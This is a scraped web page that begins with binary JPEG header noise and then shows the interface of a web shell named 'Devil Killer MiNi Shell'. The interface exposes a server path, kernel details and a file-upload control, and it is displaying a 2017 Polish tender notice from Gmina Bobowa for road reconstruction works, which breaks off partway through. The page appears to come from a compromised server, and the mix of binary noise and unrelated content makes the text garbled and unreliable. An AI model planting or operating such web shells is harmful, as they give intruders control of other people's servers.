JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170317/46017-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bobowa.pl, www.bobowa.pl/BIP' target='_blank'>http://www.bobowa.pl, www.bobowa.pl/BIP</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 46017 - 2017
              z dnia 2017-03-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bobowa: Przebudowa i zmiana nawierzchni dróg na terenie Gminy Bobowa  etap I <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Przebudowa i zmiana nawierzchni dróg na terenie Gminy Bobowa  etap I realizowana w ramach działania ,,Podstawowe usługi i odnowa wsi na obszarach wiejskich, poddziałanie ,,Wsparcie inwestycji związanych z tworzeniem, ulepszeniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędzanie energii  operacje typu ,,Budowa lub modernizacja dróg lokalnych objęte Programem Rozwoju Obszarów Wiejskich na lata 2014-2020.</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Bobowa, krajowy numer identyfikacyjny
              53595900000, ul.
              Rynek 
              21,
              38350  
              Bobowa, woj.
              małopolskie, państwo
              Polska, tel.
              183 514 300, e-mail
              inwestycje@ug.bobowa.pl, faks
              018 3514300 w. 21.
              <br />
              Adres strony internetowej (URL): www.bobowa.pl, www.bobowa.pl/BIP<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bobowa.pl, www.bobowa.pl/BIP</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.bobowa.pl, www.bobowa.pl/BIP</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Pisemnie.<br />
                Adres:
                <br />Urząd Miejski w Bobowej, ul Rynek 21, 38-350 Bobowa, pok. Nr 4 Sekretariat.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa i zmiana nawierzchni dróg na terenie Gminy Bobowa  etap I <br /><b>Numer referencyjny: </b>RiGK.271.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />7<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest: Przebudowa i zmiana nawierzchni dróg na terenie Gminy Bobowa - etap I.  
Zamówienie obejmuje wykonanie następujących zakresów robót:
Część I: 
Zmiana nawierzchni drogi gminnej Nr 270093K Bobowa  ul. Św. Wawrzyńca  Pułanki w miejscowości Bobowa w km 0+000  1+180 wraz z przebudową pobocza na ciąg pieszy na działkach nr 916, 868/17, 868/13, 869/20, 868/15, 869/14, 869/18.
W zakres robót wchodzi wykonanie:
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Roboty ziemne
- Wymiana nawierzchni bitumicznej na betonową 
- Przebudowa pobocza na chodnik z kostki betonowej 
- Przebudowa zjazdów do posesji przez chodnik (z kostki betonowej)
- Przebudowa zjazdów do posesji z wymianą nawierzchni żwirowej na betonową
- Roboty wykończeniowe (czyszczenie rowów i humusowanie skarp)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami

Część II: 
Przebudowa drogi gminnej Nr 270100 K Bobowa  Stadion Sportowy w miejscowości Bobowa w km 0+000  0+255 wraz z przebudową pobocza na ciąg pieszo-rowerowy na działkach nr 389/2, 388/2, 385/2.
W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Roboty ziemne
- Wymiana nawierzchni bitumicznej
- Przebudowa odcinka pobocza na ciąg pieszo  rowerowy  nawierzchnia z kostki betonowej
- Przebudowa zjazdów do posesji (nawierzchnia z kostki betonowej)
- Regulacja wysokościowa zjazdów warstwą żwirową  
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami

Część III: 
Przebudowa drogi gminnej Nr 270090K Bobowa  ul. 650-lecia w miejscowości Bobowa w km 0+000 - 0+ 689 wraz z przebudową pobocza na ciąg pieszy na działkach nr 1179, 1255, 850/1, 850/4, 823/4, 831/1, 851/4, 853/2, 796/21, 843/1, 824/2, 825/2, 826/6, 827/10, 827/7, 828/7, 830/6, 830/5, 839/2, 857, 797/1, 914.
W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Roboty ziemne
- Wymiana nawierzchni bitumicznej
- Przebudowa odcinka pobocza na ciąg pieszy  nawierzchnia z kostki betonowej
- Przebudowa zjazdów do posesji (nawierzchnia z kostki betonowej)
- Regulacja wysokościowa zjazdów 
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp, oczyszczenie rowów)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami

Część IV: 
Zmiana nawierzchni drogi gminnej Nr 270082K Bobowa  Szkoła  Pułanki w miejscowości Bobowa w km do 0+515 do 1+017 wraz z zabezpieczeniem rowu na działce nr 914.
W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze (pomiary, obsługa geodezyjna)
- Roboty rozbiórkowe i ziemne (rozbiórka istniejącej nawierzchni bitumicznej, rozbiórka istniejącego umocnienia rowów z korytek betonowych i płyt ażurowych)
- Wykonanie podbudowy z kruszyw łamanych
- Wykonanie nawierzchni betonowej
- Regulacja wysokościowa zjazdów
- Zabezpieczenie rowów przydrożnych korytkiem ściekowym z umocnieniem płytami ażurowymi
- Roboty wykończeniowe (uzupełnienia poboczy, oczyszczanie rowów z namułu)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami

Część V: 
Przebudowa drogi gminnej Nr 270092K Bobowa  Rynek w miejscowości Bobowa w km 0+000  0+060 na działce nr 1240.
W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze ( pomiary, organizacja ruchu)
- Roboty rozbiórkowe i ziemne (rozbiórka istniejącej nawierzchni bitumicznej)
- Wykonanie wzmocnienia podbudowy
- Warstwa przeciwspękaniowa pod warstwy bitumiczne
- Wykonanie nawierzchni bitumicznej
- Wykonanie ścieków przykrawężnikowych z kostki kamiennej
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami

Część VI: 
Zmiana nawierzchni drogi gminnej Nr 270120K Brzana  Piekło  Jankowa /Dół/  w miejscowości Brzana w km 0+000  0+850 na działce nr 691.
W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni betonowej i przepustów rurowych)
- Roboty ziemne
- Wymiana  przepustu pod drogą
- Wymiana nawierzchni betonowej na bitumiczną 
- Przebudowa zjazdów do posesji (nawierzchnia bitumiczna)
- Regulacja wysokościowa zjazdów
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami

Część VII: 
Przebudowa drogi gminnej Nr 270166K Siedliska  Tłoki w miejscowości Siedliska w km 0+000  1+080 na działkach nr 670, 675.
W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Wymiana nawierzchni bitumicznej
- Przebudowa zjazdów do posesji (nawierzchnia bitumiczna)
- Regulacja wysokościowa zjazdów warstwą żwirową 
- Oczyszczenie rowów
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp, oczyszczenie rowów)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami.

Szczegółowy zakres przedmiotowych robót budowlanych został określony za pomocą dokumentacji technicznej, zawierającej:
a)Projekt budowlany. 
b)Przedmiar robót jako element pomocniczy.
c)Specyfikacja techniczna wykonania i obioru robót budowlanych;
- stanowiącej Załącznik nr 1 do specyfikacji.

<br /><br /><b>II.5) Główny kod CPV: </b>45233142-6<br /><b> Dodatkowe kody CPV:</b>45100000-8,
                45110000-1,
                45111200-0,
                45200000-9,
                45220000-5,
                45222000-9,
                45233000-9,
                45233162-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 29/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnieniu warunków.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Należy wykazać, że Wykonawca posiada środki lub zdolność kredytową na kwotę nie mniejszą niż dla części: 
I  328 000,00 zł
II  235 000,00 zł
III  282 000,00 zł
IV  129 000,00 zł
V  29 000,00 zł
VI  232 000,00 zł
VII  342 000,00 zł

Uwaga: Ze względu na tożsamość czasową wykonania poszczególnych części zamówienia w przypadku, gdy Wykonawca składa ofertę na więcej niż jedną część zamówienia, musi się wykazać, że posiada środki finansowe lub zdolność kredytową na łączną sumę wymaganą do poszczególnych części.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zmawiający będzie rozpatrywał oferty Wykonawców:
a)którzy nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali w sposób należyty oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończyli co najmniej dwie (2) roboty budowlane:
dla części I w zakresie wykonania nawierzchni betonowej wraz z podbudową o łącznej długości minimum 1 km, 
dla części II w zakresie wykonania nawierzchni bitumicznej wraz z podbudową o łącznej długości 500 m oraz budowy chodników, placów o powierzchni ułożonej kostki brukowej minimum 250 m2,
dla części III w zakresie wykonania nawierzchni bitumicznej wraz z podbudową o łącznej długości minimum 1200 m oraz budowy chodników, placów o powierzchni ułożonej kostki brukowej minimum 250 m2, 
dla części IV w zakresie wykonania nawierzchni betonowej wraz z podbudową o łącznej długości minimum 1000 m, 
dla części V w zakresie wykonania nawierzchni bitumicznej wraz z podbudową o łącznej długości minimum 100 m,
dla części VI w zakresie wykonania nawierzchni bitumicznej wraz z podbudową                         o łącznej długości minimum 1600 m,
dla części VII w zakresie wykonania nawierzchni bitumicznej wraz z podbudową o łącznej długości minimum 2000 m,

b)którzy wykażą się dysponowaniem osobami skierowanymi przez Wykonawcę                        do realizacji zamówienia tj.:
dla części od I do VII:
- minimum jedna osoba posiadająca uprawnienia budowlane uprawniające                         do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności inżynieryjnej drogowej; 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.
Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w § 5 pkt. 1-9 rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r., poz. 1126), zwany dalej Rozporządzeniem w sprawie rodzajów dokumentów (jeżeli dotyczy).
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane,a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - warunki określone zostały w Rozdziale V pkt 3 ppkt 3.3 lit. a) specyfikacji,
2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami  budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, warunki określone zostały w Rozdziale V pkt 3 ppkt 3.3 lit. b) specyfikacji,
3. Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej,                    potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Oferta Wykonawcy.
2. Wykonawca składa wraz z ofertą aktualne na dzień składania ofert oświadczenie Wykonawcy w zakresie wskazanym przez Zamawiającego, stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu - wg wzoru stanowiącego Załącznik nr 3 do specyfikacji.Uwaga! W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.
3. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji,o której mowa w art. 86 ust. 3 ustawy, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty, bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wzór oświadczenia stanowi Załącznik nr 5 do specyfikacji.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Wykonawca jest zobowiązany do wniesienia wadium w wysokości dla części:

I  16 000,00 PLN (słownie złotych: szesnaście tysięcy zł)
II  11 000,00 PLN (słownie złotych: jedenaście tysięcy zł)
III  14 000,00 PLN (słownie złotych: czternaście tysięcy zł)
IV  6 000,00 PLN (słownie złotych: sześć tysięcy zł)
V  1 400,00 PLN (słownie złotych: jeden tysiąc czterysta zł)
